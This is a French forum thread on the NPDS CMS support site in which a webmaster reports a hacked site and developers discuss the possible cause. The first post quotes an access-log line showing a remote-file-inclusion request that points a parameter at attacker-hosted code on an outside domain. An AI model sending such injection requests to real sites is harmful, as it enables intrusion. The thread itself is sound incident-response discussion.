NPDS : Gestion de contenu et de communauté
Content & Community Management System (CCMS) robuste, sécurisé, complet, performant, parlant vraiment français, libre (Open-Source) et gratuit.
25 visiteur(s) et 0 membre(s) en ligne.
Autres infos
Activité du Site
Pages vues depuis 25/05/2001 : 106 254 376
- Nb. de membres 8 692
- Nb. d'articles 1 695
- Nb. de forums 26
- Nb. de sujets 8
- Nb. de critiques 92
Index du forum »» Sécurité »» Piratage site
Nouveau sujet
Piratage site#22190Répondre
6Contributeur(s)
3 Modérateur(s)
Anonyme
Bonsoir à tous!
Notre site a été piraté il y a quelques jours et donc OVH nous a alerté et signalé ce piratage.
OVH nous a enfin signalé la ligne du log qui montre la faille sur le site :
38.119.120.61 www.xxxxxx.com - [05/Apr/2007:13:37:48 +0200] "GET /index.php?st=http://turinagyker.hu/.img/xQt.c? HTTP/1.1" 302 5 "-" "libwww-perl/5.805"
Je suis étonné de voir qu'à partir de l'index on peut être piraté!??
Voilà c'était juste pour vous signaler le problème en attendant que j'épluche le script de index.php en détail.
Mais peut-être que vous avez une idée?
Notre site a été piraté il y a quelques jours et donc OVH nous a alerté et signalé ce piratage.
OVH nous a enfin signalé la ligne du log qui montre la faille sur le site :
38.119.120.61 www.xxxxxx.com - [05/Apr/2007:13:37:48 +0200] "GET /index.php?st=http://turinagyker.hu/.img/xQt.c? HTTP/1.1" 302 5 "-" "libwww-perl/5.805"
Je suis étonné de voir qu'à partir de l'index on peut être piraté!??
Voilà c'était juste pour vous signaler le problème en attendant que j'épluche le script de index.php en détail.
Mais peut-être que vous avez une idée?
Message édité par : Boris / 12-04-2007 23:30
Anonyme
URGENT!!!!
Est-il possible d'éditer le post et d'enlever la référence au site???
Merci d'avance!!!
Est-il possible d'éditer le post et d'enlever la référence au site???
Merci d'avance!!!
Tito
Citation : Anonyme
avec un st= .... ????
Clairement! NPDS n'utilise pas de variable $st et en plus on a l'URL-Protect qui empêche ce genre d'attaquesavec un st= .... ????
Tito
Tu es sûr d'utiliser NPDS? :-?
Tu utiliserais pas le central board de Dodi?
Tu utiliserais pas le central board de Dodi?
Message édité par : Tito / 13-04-2007 18:02
Anonyme
bah je sais pas quoi vous dire moi...
le site a été piraté comme indiqué dans le premier post
et développé sur NPDS ...
le site a été piraté comme indiqué dans le premier post
et développé sur NPDS ...
Alat
Salut c'est Alat. Oui le site est bien sur une dernière version de NPDS, c'est moi qui l'ai fait pour notre ami lyonnais NPDSien, mais j'ai cru comprendre qu'il fallait pas donner le nom du site ici...
C'est du Sable bien tassé, avec très peu de modifications sur le noyau, juste le thème.
J'ai ouvert l'upload de photos persos <> des avatars mais c'est un formulaire simple et je crois pas que ce soit passé par là. Je ne connais pas les chmods par coeur donc je ne sais pas si tout est opimisé chez l'hébergeur. Je reposte dès que j'ai l'autorisation de vous dire quel site c'est :-) à tout à l'heure donc
C'est du Sable bien tassé, avec très peu de modifications sur le noyau, juste le thème.
J'ai ouvert l'upload de photos persos <> des avatars mais c'est un formulaire simple et je crois pas que ce soit passé par là. Je ne connais pas les chmods par coeur donc je ne sais pas si tout est opimisé chez l'hébergeur. Je reposte dès que j'ai l'autorisation de vous dire quel site c'est :-) à tout à l'heure donc
Boris
J'ai transmis à dev l'information, avec le nom du site, sur demande de notre ami NPDSsien, donc il est au courant de l'affaire. Si le propriétaire du site préfère qu'on traite cela au sein de la team, on en parlera en "zone sûre", et on donnera simplement le résultat des investigations ici.